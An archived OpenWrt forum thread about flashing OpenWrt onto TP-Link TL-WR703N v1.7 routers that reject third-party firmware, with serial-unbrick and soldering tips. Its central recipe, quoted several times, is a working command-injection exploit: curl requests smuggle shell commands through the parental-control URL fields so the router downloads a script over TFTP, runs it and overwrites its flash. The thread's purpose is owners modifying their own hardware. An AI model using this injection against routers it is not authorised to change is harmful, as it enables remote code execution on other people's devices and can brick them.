OpenWrt Forum Archive

Topic: Unable to Flash via WEB TP-Link TL-WR703N

The content of this topic has been archived between 5 Apr 2018 and 29 Apr 2018. There are no obvious gaps in this topic, but there may still be some posts missing at the end.

Okay, thanks.  And has it been confirmed that the GUI is the only place it checks to see if the image is valid?  I seem to recall this checking when flashing via serial (checks to see if the image is valid before flashing).

Anyone have success flashing the Chinese TL703N v.1.7 to OpenWRT?  I have an Avalon ASIC miner which has a cooked 703n .... bought a new 703n off Amazon, tried to flash, and ... whammo - into the same boat with you guys. Looking for a solution.

Hi,
can I install OpenWrt 12.09AA with serial console? Will it normally work after installation? I will use it as a NAS device.

Anyone able to get the firmware uploaded?

I also have a 3.17.1 Build 140120 Rel.56593n and it will take the tp link firmware wr703nv1.bin but no other. I tried attitude adjustment renamed to wr703nv1.bin and still rejected with error 18005. Any help is much appreciated.

Hi guys,

Hope this helps you guys as I didn't see any solution.
Well as soon as I got my wr703n, i thought it was great idea to flash to latest FW before flashing OpenWRT... boy was I wrong.
Anyways today I finally had the time and tried the serial console method back to the "original image" on openwrt's wiki page for WR703N... and it worked! I then used it to flash openwrt barrier breaker via the webpage, and now its happily running openwrt!

Some hints on soldering the leads:
-Use fine tip iron, (I didn't have any so next best option was to use small amounts of solder on flat side of the tip
-Tin the tx/rx pads first. Before i did this i used a flathead screwdriver to put micro scratches in the oxide, then i placed flux over it before quickly dabbing it with hot solder for ~1 second. You should see a blob of solder where the pad is.
-Tin the wire you're using (This makes it super easy to solder on to the pad, make sure you use thin wire)
-Hold down the wire with the flat head screwdriver so when solder melts, you will flatten the wire across the pad.
-Solder it! Should only take ~2seconds contact max. After that hot glue the wires in place.

Edit: I was thinking and for those who cant solder, you'll likely be able to use alligator clips too. Just make sure u put paper or some form of insulation on the underside!

To send the serial messages, I used a cheap ~$3 USB to TTL adapter I had laying around.


Link to wiki page: http://wiki.openwrt.org/toh/tp-link/tl-wr703n
Link to "Original Image": http://www.tp-link.com.cn/download/2011930104462.rar
Link to Serial Unbrick method: http://forums.openpilot.org/blog/52/ent … fi-router/

TLDR; Managed to downgrade firmware via serial method. Then flashed openwrt via the older FW's webpage. Everything seems to be working fine.
Might be able to flash straight from 140120 to OpenWRT using serial. Didnt try.

(Last edited by wwwsam on 3 Nov 2014, 17:11)

I bought a bunch of TP-Link 703 units and have been trying to convert them to my own openwrt build. I've tried using the original TP-Link firmware, the trunk firmware of openwrt, my own factory and sysupgrade build and each time, the device gets bricked.

I found this info today on one of the devices, in /etc

...in a file called avalon_version

20131229
cgminer: 698d677
cgminer-openwrt-packages: aadd747+
luci: 346e3e7+

meminfo doesn't show anything unsual, MemTotal: 29068 similar to new devices.
CPU: Atheros AR9330 rev 1
TP-LINK TL-WR703N V1

version
Linux Version 3.10.18 (con@hex) (gcc version 4.6.4 (OpenWrt/Linaro GCC 4.62013.05 r38816) ) #3 Sun Dec 29 16:34:52 EST 2013

And on mine, with my custom build I'm trying to install;

Linux version 3.3.8 (blogic@Debian-60-squeeze-64-minimal) (gcc version 4.6.3 20120201 (prerelease) (Linaro GCC 4.6-2012.02) ) #1 Sat Mar 23 16:49:30 UTC 2013

Looking on the net, this is a bit beyond me. Looks like some other version of openwrt?

OpenWrt packages for Avalon firmware

https://github.com/Canaan-Creative/cgmi … t-packages

They are all running OpenWrt Barrier Breaker r38816
Is there some safe way of converting these back to either a default openwrt build or my own?

I sure hope someone can help me. I don't want to brick any more of these.

Thanks.

(Last edited by projects on 6 Nov 2014, 01:08)

Hi... I don't know if this will help, but I have had success flashing OpenWRT AA and custom uboot as documented here:

http://gerryk.com/node/34

projects wrote:

I bought a bunch of TP-Link 703 units and have been trying to convert them to my own openwrt build. I've tried using the original TP-Link firmware, the trunk firmware of openwrt, my own factory and sysupgrade build and each time, the device gets bricked.

I found this info today on one of the devices, in /etc

...in a file called avalon_version

20131229
cgminer: 698d677
cgminer-openwrt-packages: aadd747+
luci: 346e3e7+

meminfo doesn't show anything unsual, MemTotal: 29068 similar to new devices.
CPU: Atheros AR9330 rev 1
TP-LINK TL-WR703N V1

version
Linux Version 3.10.18 (con@hex) (gcc version 4.6.4 (OpenWrt/Linaro GCC 4.62013.05 r38816) ) #3 Sun Dec 29 16:34:52 EST 2013

And on mine, with my custom build I'm trying to install;

Linux version 3.3.8 (blogic@Debian-60-squeeze-64-minimal) (gcc version 4.6.3 20120201 (prerelease) (Linaro GCC 4.6-2012.02) ) #1 Sat Mar 23 16:49:30 UTC 2013

Looking on the net, this is a bit beyond me. Looks like some other version of openwrt?

OpenWrt packages for Avalon firmware

https://github.com/Canaan-Creative/cgmi … t-packages

They are all running OpenWrt Barrier Breaker r38816
Is there some safe way of converting these back to either a default openwrt build or my own?

I sure hope someone can help me. I don't want to brick any more of these.

Thanks.

Just wanted to check back in to see if anyone made any progress with this problem.

Did anyone figured out what sort of check the new TP-Link firmware is performing or how to make OpenWRT flashable from the TP-Link Web Interface on v1.7? Thanks

I don't know if it helps any of you, but you can flash the WR703 with only power and network (no serial, soldering on opening the box needed).

my "Solution":

http://pastebin.com/0wzMthfr

bugblue wrote:

I don't know if it helps any of you, but you can flash the WR703 with only power and network (no serial, soldering on opening the box needed).

my "Solution":

http://pastebin.com/0wzMthfr

hi @bugblue, welcome to the forum!

Are you saying the tftp method you posted above will allow you to flash openWRT onto the WR703N running the latest TP-LINK firmware (v1.7 routers)?

If so, you're amazing. If not, what the heck are doing? smile

edit: @bugblue is AMAZING!

KK

(Last edited by King0fK0ng on 30 Jan 2015, 23:39)

bugblue wrote:

I don't know if it helps any of you, but you can flash the WR703 with only power and network (no serial, soldering on opening the box needed).

my "Solution":

http://pastebin.com/0wzMthfr


Great, can you provide all of the tools to download it? 
thank you very much.

bugblue wrote:

I don't know if it helps any of you, but you can flash the WR703 with only power and network (no serial, soldering on opening the box needed).

my "Solution":

http://pastebin.com/0wzMthfr

My Wr703 firmware is "3.17.1 Build 140120 Rel.56593n  "
I'm success  flash the WR703 to Openwrt  use your solution.

Thank you.

3.17.1 Build 140120 Rel.56593n
WR703N v1 00000000



Upgrade your new WR703N V1.7 to openwrt.

WARNING: THIS CAN BRICK YOUR DEVICE. DO NOT RELY ON ANY OF THIS INFORMATION.
These are just hints how I did it.

If you have no experience with wr703n's. Just buy a MR3020.

You'll need:
* A FTP server (in my case 192.168.1.9, I advise to use the same IP or understand what the hell you're doing)
* An unix or mac workstation with curl (can be the same box)
* A general knowledge of unix commands.
* An openwrt image. I make my own but stock 12.09 might work.
 http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin
* A binary busybox for mips static compiled.
  http://www.busybox.net/downloads/binaries/1.16.1/busybox-mips

The general idea:
* Put a script on your tp-link wr703n
* Put a better busybox on your tp-link wr703n
* Trick the wr703n into executing some commands to run this script.
The script:
* get the first en second part of the image from tftp
* flash the first part of the image (1024k) to the mtd partition named kernel
* flash the rest of the image (2819k) to the mtd partition named rootfs
* reboot the box with openwrt on it.

First setup the tftp server and put the following files there:

=== file aa cut from here ======
cd /tmp
tftp -gl i1 192.168.1.9
tftp -gl i2 192.168.1.9
tftp -gl busybox 192.168.1.9
chmod 755 busybox 
./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
./busybox reboot -f
echo blaaat
=== /file aa cut to here =======
Put the rest also there:
* busybox
* openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin

Cut the openwrt image in 2 parts. (Yes these commands):
  These commands can take a while since I had no interrest in calculating a better blocksize.
dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576

now there are 4 files in your TFTP directory: aa, busybox, i1, i2

Now let's take a router and have it set to the factory settings.

Run these commands on you're workstation.
# !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!
# First it wants a password set, let's do that. (the password is admin42 after this).
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
# Secondly it wants to have parental control enabled (probably the once in a lifetime opportunity to use this).
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'
# That being done, now all we need is to just simply exploit the router.
# readable it does:
# cd /tmp ; tftp -gl aa 192.168.1.9; sh aa
# DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
# DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).

Just wait until it starts to blink, than openwrt is loading. Depending on your image you can reach it on it's mac address.

If you have no experience with wr703n's. Just buy a MR3020.

I have the same build as interdev but still was not able to flash my tp-link with openwrt using above method

bugblue wrote:

I don't know if it helps any of you, but you can flash the WR703 with only power and network (no serial, soldering on opening the box needed).

my "Solution":

http://pastebin.com/0wzMthfr

it works. thank you very much.

bugblue wrote:

I don't know if it helps any of you, but you can flash the WR703 with only power and network (no serial, soldering on opening the box needed).

my "Solution":

http://pastebin.com/0wzMthfr

Brilliant! Thanks.

Looks like in latest tp-link fw has been fixed bug to use this method. It doesn't work... any ideas?

Install previous fw?

Where I can download previous version? And is it possible to downgrade?

cart wrote:

Looks like in latest tp-link fw has been fixed bug to use this method. It doesn't work... any ideas?

What is the version number for the latest tp-link firmware? It should be something like the below (see first post for example).

3.17.1 Build 140120 Rel.56593n 

Did you buy it new with it pre-installed or did you upgrade? If you upgrade, can you share the link you used to download?

If you bought it new, what version is it - v1.7, v1.8?

For what it's worth, I've just bought a 2nd WR703N from ebay.

It was a v1.7 running 3.17.1 Build 140120 Rel.56593n and bugblue's method worked fine, again.

Hello,

I have some problems using bugblue method. Enabling parental control and later exploiting the vulnerability seems to fail... as no change in led or Chinese web interface takes place, see commands output bellow.

router addr : 192.168.1.1
TFTP server addr: 192.168.1.106

please advice.


--------------------------------------------------------------

Sobiturs-iMac:~ sobitur$ curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
Sobiturs-iMac:~ sobitur$ curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRp … amp;Page=1'
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<HTML>
<HEAD><TITLE>TL-WR703N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<SCRIPT language="javascript" type="text/javascript"><!--
//--></SCRIPT>
<script type="text/javascript">
var httpAutErrorArray = new Array(
1, 0,0 );
</SCRIPT>

<style type="text/css">
body{
    font-family:"????";
    background-color:white;
    margin:0px;
    padding:0px;
}
div.loginBox
{
    display: block;
    position:relative;
    margin-top:10%;   
    text-align:center;
}

div.panelThre{
    margin-top:10px;
}
div.picDiv{
    width:457px;
    height:321px;
    background:url(../login/images/loginbg.png);
    position:relative;
}
input.pcPassword{
    width:300px;
    height:50px;
    line-height:50px;
}

.topLogo{
    background:url(../login/images/top_bg.png);
    height:55px;
}

ul{
    padding:40px 0px 0px 0px;
    margin:0px;
    list-style:none;
}
ul li{
    width:341px;
    text-align:left;
    color:#656565;
    font-family:"????";
    font-weight:normal;
    font-size:12pt;
    margin-top:10px;
    display:inline-block;
    _display:inline;
    _zoom:1;   
}

.errMsg
{
    color:#fd1515;
}
li.pwLi{   
    height:40px;
    background:url(../login/images/loginPwd.png);
}

input.text{
    border:0px;
    height:36px;
    line-height:normal;   
    width:337px;
    padding:10px 0px;
    margin:2px 0px 0px 2px;
    font-size:14px;
    color:#6a6969;
    font-family:"????";
    font-weight:normal;
    background-color:transparent;
    vertical-align:middle;
}
label.loginBtn{
    height:40px;
    display:inline-block;
    width:148px;
    margin-top:20px;
    background:url(../login/images/loginBtn.png);
    cursor:pointer;   
    vertical-align:middle;
    text-align: center;
    color:white;
    font-family:"????";
    font-weight:normal;
    font-size:14pt;
    line-height:40px;
}
</style>
<script type="text/javascript">
function Base64Encoding(input)
{
    var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;

    input = utf8_encode(input);

    while (i < input.length)
    {

        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2)) {
            enc3 = enc4 = 64;
        } else if (isNaN(chr3)) {
            enc4 = 64;
        }

        output = output +
        keyStr.charAt(enc1) + keyStr.charAt(enc2) +
        keyStr.charAt(enc3) + keyStr.charAt(enc4);

    }

    return output;
}

function utf8_encode (string)
{
    string = string.replace(/\r\n/g,"\n");
    var utftext = "";

    for (var n = 0; n < string.length; n++) {

        var c = string.charCodeAt(n);

        if (c < 128) {
            utftext += String.fromCharCode(c);
        }
        else if((c > 127) && (c < 2048)) {
            utftext += String.fromCharCode((c >> 6) | 192);
            utftext += String.fromCharCode((c & 63) | 128);
        }
        else {
            utftext += String.fromCharCode((c >> 12) | 224);
            utftext += String.fromCharCode(((c >> 6) & 63) | 128);
            utftext += String.fromCharCode((c & 63) | 128);
        }

    }

    return utftext;
}

function CheckUserPsw(szValue)
{
    var reg = /^[\x21-\x7e]+$/;   
    if(!reg.test(szValue))
    {
        return false;
    }
    return true;
}

var pswLenMsg = "???볤??ֻ??Ϊ6-15λ??";
var pswInvalid = "????????????֡???ĸ?????ִ?Сд???????ŵ???ϣ??ո???⣩??";

function CheckPswLength()
{
    if(httpAutErrorArray[0] == 2 )
    {
        return false;
    }
    var pcPassword = $("pcPassword");
    if(pcPassword.value.length == 0)
    {
        return false;
    }
    else if(!CheckUserPsw(pcPassword.value))
    {
        $("errMsg").style.visibility = "visible";
        $("errMsg").innerHTML = pswInvalid;
        return false;
    }
    else if(pcPassword.value.length < 6 || pcPassword.value.length > 15)
    {
        $("errMsg").style.visibility = "visible";
        $("errMsg").innerHTML = pswLenMsg;
        return false;
    }
    else
    {
        $("errMsg").style.visibility = "hidden";
    }
    return true;
}

function setPswDisable(state)
{
    var pcPassword = $("pcPassword");
    pcPassword.style.display = (state)?"none":"";
    var pwLi = $("pwLi");
   
    if(state == true)
    {
        pwLi.style.background = "url(../login/images/loginPwdL.png) no-repeat";
    }
    else
    {
        pwLi.style.background = "url(../login/images/loginPwd.png) no-repeat";       
        pcPassword.focus();
    }   
}

function PCWin(event)
{   
    if (event.keyCode == 13)
    {
        PCSubWin();
    }
}

function PCSubWin()
{
    if(CheckPswLength() == true )
    {
        var strtemp = location.href;
        var password = $("pcPassword").value;   
        var auth = "Basic "+Base64Encoding("admin:"+password);
        document.cookie = "Authorization="+escape(auth)+";path=/";
        location.href = strtemp;
    }
}

function w(str)
{
    document.write(str);
}

function $(id)
{
    return document.getElementById(id);
}

function pageLoad()
{
    var loginBtn = $("loginBtn");
    loginBtn.onmouseover = function(){
        loginBtn.style.background = "url(../login/images/loginBtnH.png)";
    };
    loginBtn.onmouseout = function(){
        loginBtn.style.background = "url(../login/images/loginBtn.png)";
    };
    document.cookie = "Authorization=;path=/";
    var ErrNum = httpAutErrorArray[0];
    switch(ErrNum)
    {
        case 1:
            isShowReset = true;
            $("errMsg").innerHTML = "????????????????롣";
            $("errMsg").style.visibility = "visible";
            $("resetMsg").style.visibility = "visible";
            setPswDisable(false);
        break;
        case 2:
            isShowReset = true;
            $("errMsg").innerHTML = "????????Ѵ?10?Σ?????Сʱ???ٳ??ԡ?";
            $("errMsg").style.visibility = "visible";
            $("resetMsg").style.visibility = "visible";
            setPswDisable(true);   
        break;
        case 0:
        default:
            isShowReset = false;
            $("errMsg").style.visibility = "hidden";
            $("resetMsg").style.visibility= "hidden";
            setPswDisable(false);   
        break;
    }
}

var isShowReset = false;
function showResetMsg()
{
    isShowReset = !isShowReset;
    $("resetMsg").style.visibility = (isShowReset)?"visible":"hidden";
}
</script>
</head>
<body onkeypress="PCWin(event)" onload="pageLoad()">

    <div class="topLogo">
        <a href="http://www.tp-link.com.cn" target="blank" ><img src="../login/images/top1_1.png" border="0" style="cursor:pointer"></a>
    </div>
    <div class="loginBox">   
        <div class="panelThre" align="center">
            <div align="center" class="picDiv" align="center">
                <ul>
                    <li style="font-size:14pt">?????????Ա????</li>
                    <li id="pwLi" class="pwLi"><input class="text" id="pcPassword" name="pcPassword" type="password" maxlength="15" oninput="CheckPswLength()" onpropertychange="CheckPswLength()" autocomplete="on"></li>
                    <li><label id="errMsg" class="errMsg" style="visibility:hidden">????????Ѵ?10?Σ?????Сʱ???ٳ??ԡ?</label></li>
                    <li><u onclick="showResetMsg();" style="cursor:pointer">???????룿</u></li>
                    <li><label id="resetMsg" style="visibility:hidden" >?????????룬??ָ????????ã??ָ??????????豸ͨ??????£???סReset??ť????10?????ϡ?</label></li>
                </ul>
                <label id="loginBtn" class="loginBtn" onclick="PCSubWin()">ȷ??</label>
            </div>
        </div>
    </div>
</body>
</html>Sobiturs-iMac:~ sobitur$ curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW43D; ChgPwdSubTag=' --referer 'http://192.168.0.100/userRpm/ParentCtrl … amp;Page=1' 'http://192.168.0.100/userRpm/ParentCtrl … %A3+%B4%E6'
^[[D^[[D^[[D^[[D^[[Dcurl: (7) Failed to connect to 192.168.0.100 port 80: Network is unreachable
Sobiturs-iMac:~ sobitur$ curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRp … amp;Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRp … %A3+%B4%E6'
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<HTML>
<HEAD><TITLE>TL-WR703N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<SCRIPT language="javascript" type="text/javascript"><!--
//--></SCRIPT>
<script type="text/javascript">
var httpAutErrorArray = new Array(
1, 0,0 );
</SCRIPT>

<style type="text/css">
body{
    font-family:"????";
    background-color:white;
    margin:0px;
    padding:0px;
}
div.loginBox
{
    display: block;
    position:relative;
    margin-top:10%;   
    text-align:center;
}

div.panelThre{
    margin-top:10px;
}
div.picDiv{
    width:457px;
    height:321px;
    background:url(../login/images/loginbg.png);
    position:relative;
}
input.pcPassword{
    width:300px;
    height:50px;
    line-height:50px;
}

.topLogo{
    background:url(../login/images/top_bg.png);
    height:55px;
}

ul{
    padding:40px 0px 0px 0px;
    margin:0px;
    list-style:none;
}
ul li{
    width:341px;
    text-align:left;
    color:#656565;
    font-family:"????";
    font-weight:normal;
    font-size:12pt;
    margin-top:10px;
    display:inline-block;
    _display:inline;
    _zoom:1;   
}

.errMsg
{
    color:#fd1515;
}
li.pwLi{   
    height:40px;
    background:url(../login/images/loginPwd.png);
}

input.text{
    border:0px;
    height:36px;
    line-height:normal;   
    width:337px;
    padding:10px 0px;
    margin:2px 0px 0px 2px;
    font-size:14px;
    color:#6a6969;
    font-family:"????";
    font-weight:normal;
    background-color:transparent;
    vertical-align:middle;
}
label.loginBtn{
    height:40px;
    display:inline-block;
    width:148px;
    margin-top:20px;
    background:url(../login/images/loginBtn.png);
    cursor:pointer;   
    vertical-align:middle;
    text-align: center;
    color:white;
    font-family:"????";
    font-weight:normal;
    font-size:14pt;
    line-height:40px;
}
</style>
<script type="text/javascript">
function Base64Encoding(input)
{
    var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;

    input = utf8_encode(input);

    while (i < input.length)
    {

        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2)) {
            enc3 = enc4 = 64;
        } else if (isNaN(chr3)) {
            enc4 = 64;
        }

        output = output +
        keyStr.charAt(enc1) + keyStr.charAt(enc2) +
        keyStr.charAt(enc3) + keyStr.charAt(enc4);

    }

    return output;
}

function utf8_encode (string)
{
    string = string.replace(/\r\n/g,"\n");
    var utftext = "";

    for (var n = 0; n < string.length; n++) {

        var c = string.charCodeAt(n);

        if (c < 128) {
            utftext += String.fromCharCode(c);
        }
        else if((c > 127) && (c < 2048)) {
            utftext += String.fromCharCode((c >> 6) | 192);
            utftext += String.fromCharCode((c & 63) | 128);
        }
        else {
            utftext += String.fromCharCode((c >> 12) | 224);
            utftext += String.fromCharCode(((c >> 6) & 63) | 128);
            utftext += String.fromCharCode((c & 63) | 128);
        }

    }

    return utftext;
}

function CheckUserPsw(szValue)
{
    var reg = /^[\x21-\x7e]+$/;   
    if(!reg.test(szValue))
    {
        return false;
    }
    return true;
}

var pswLenMsg = "???볤??ֻ??Ϊ6-15λ??";
var pswInvalid = "????????????֡???ĸ?????ִ?Сд???????ŵ???ϣ??ո???⣩??";

function CheckPswLength()
{
    if(httpAutErrorArray[0] == 2 )
    {
        return false;
    }
    var pcPassword = $("pcPassword");
    if(pcPassword.value.length == 0)
    {
        return false;
    }
    else if(!CheckUserPsw(pcPassword.value))
    {
        $("errMsg").style.visibility = "visible";
        $("errMsg").innerHTML = pswInvalid;
        return false;
    }
    else if(pcPassword.value.length < 6 || pcPassword.value.length > 15)
    {
        $("errMsg").style.visibility = "visible";
        $("errMsg").innerHTML = pswLenMsg;
        return false;
    }
    else
    {
        $("errMsg").style.visibility = "hidden";
    }
    return true;
}

function setPswDisable(state)
{
    var pcPassword = $("pcPassword");
    pcPassword.style.display = (state)?"none":"";
    var pwLi = $("pwLi");
   
    if(state == true)
    {
        pwLi.style.background = "url(../login/images/loginPwdL.png) no-repeat";
    }
    else
    {
        pwLi.style.background = "url(../login/images/loginPwd.png) no-repeat";       
        pcPassword.focus();
    }   
}

function PCWin(event)
{   
    if (event.keyCode == 13)
    {
        PCSubWin();
    }
}

function PCSubWin()
{
    if(CheckPswLength() == true )
    {
        var strtemp = location.href;
        var password = $("pcPassword").value;   
        var auth = "Basic "+Base64Encoding("admin:"+password);
        document.cookie = "Authorization="+escape(auth)+";path=/";
        location.href = strtemp;
    }
}

function w(str)
{
    document.write(str);
}

function $(id)
{
    return document.getElementById(id);
}

function pageLoad()
{
    var loginBtn = $("loginBtn");
    loginBtn.onmouseover = function(){
        loginBtn.style.background = "url(../login/images/loginBtnH.png)";
    };
    loginBtn.onmouseout = function(){
        loginBtn.style.background = "url(../login/images/loginBtn.png)";
    };
    document.cookie = "Authorization=;path=/";
    var ErrNum = httpAutErrorArray[0];
    switch(ErrNum)
    {
        case 1:
            isShowReset = true;
            $("errMsg").innerHTML = "????????????????롣";
            $("errMsg").style.visibility = "visible";
            $("resetMsg").style.visibility = "visible";
            setPswDisable(false);
        break;
        case 2:
            isShowReset = true;
            $("errMsg").innerHTML = "????????Ѵ?10?Σ?????Сʱ???ٳ??ԡ?";
            $("errMsg").style.visibility = "visible";
            $("resetMsg").style.visibility = "visible";
            setPswDisable(true);   
        break;
        case 0:
        default:
            isShowReset = false;
            $("errMsg").style.visibility = "hidden";
            $("resetMsg").style.visibility= "hidden";
            setPswDisable(false);   
        break;
    }
}

var isShowReset = false;
function showResetMsg()
{
    isShowReset = !isShowReset;
    $("resetMsg").style.visibility = (isShowReset)?"visible":"hidden";
}
</script>
</head>
<body onkeypress="PCWin(event)" onload="pageLoad()">

    <div class="topLogo">
        <a href="http://www.tp-link.com.cn" target="blank" ><img src="../login/images/top1_1.png" border="0" style="cursor:pointer"></a>
    </div>
    <div class="loginBox">   
        <div class="panelThre" align="center">
            <div align="center" class="picDiv" align="center">
                <ul>
                    <li style="font-size:14pt">?????????Ա????</li>
                    <li id="pwLi" class="pwLi"><input class="text" id="pcPassword" name="pcPassword" type="password" maxlength="15" oninput="CheckPswLength()" onpropertychange="CheckPswLength()" autocomplete="on"></li>
                    <li><label id="errMsg" class="errMsg" style="visibility:hidden">????????Ѵ?10?Σ?????Сʱ???ٳ??ԡ?</label></li>
                    <li><u onclick="showResetMsg();" style="cursor:pointer">???????룿</u></li>
                    <li><label id="resetMsg" style="visibility:hidden" >?????????룬??ָ????????ã??ָ??????????豸ͨ??????£???סReset??ť????10?????ϡ?</label></li>
                </ul>
                <label id="loginBtn" class="loginBtn" onclick="PCSubWin()">ȷ??</label>
            </div>
        </div>
    </div>
</body>
Sobiturs-iMac:~ sobitur$

@pbrena you seem to use a different IP for your TFTP server in your command, in the output you can see:
curl: (7) Failed to connect to 192.168.0.100 port 80: Network is unreachable

I've tried running the three commands as well and got an identical output (without the curl "Failed to connect" error), but the password remains unchanged and other commands don't do anything either (I'm assuming because the first command didn't successfully do anything).
I've got the Version 1.7 of the TL-WR703N, with the 3.17.1 Build 140120 Rel.56953n firmware as well if that makes a difference.

Hi all,

Thank you for this solution. I have followed exactly the steps described and everything goes well until the exploit itself.

I execute the command but nothing seems to happen: I get a result (http://pastebin.com/XwB3RsEG) but the blue led never blinks.

Confirmations:
- The IPs are 192.168.1.1 router and .100 tftp server;
- Admin password is now admin42;
- Parental control command executed before (http://pastebin.com/xcGNUGTc);
- FW Relase number is:

当前软件版本:     3.17.1 Build 140120 Rel.56593n
当前硬件版本:     WR703N v1 00000000
当前工作模式:     3G 路由模式

Any clues on what can be the reason for this not working with me?

Thank you